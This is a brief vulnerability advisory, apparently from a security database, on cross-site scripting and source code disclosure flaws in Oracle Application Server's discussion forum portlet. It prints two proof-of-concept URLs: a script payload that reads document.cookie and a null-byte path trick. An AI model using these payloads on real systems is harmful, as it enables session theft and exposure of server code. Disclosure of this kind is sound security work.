|
Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities
Exploit code is not required. The following proof of concept examples are available: Cross-site scripting: http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL& df_next_page=htdocs/forums.jsp& RowKeyValue=<script>alert(document.cookie)</script> Source code disclosure: http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL& df_next_page=htdocs/search.jsp%00 |
|
|
Privacy Statement |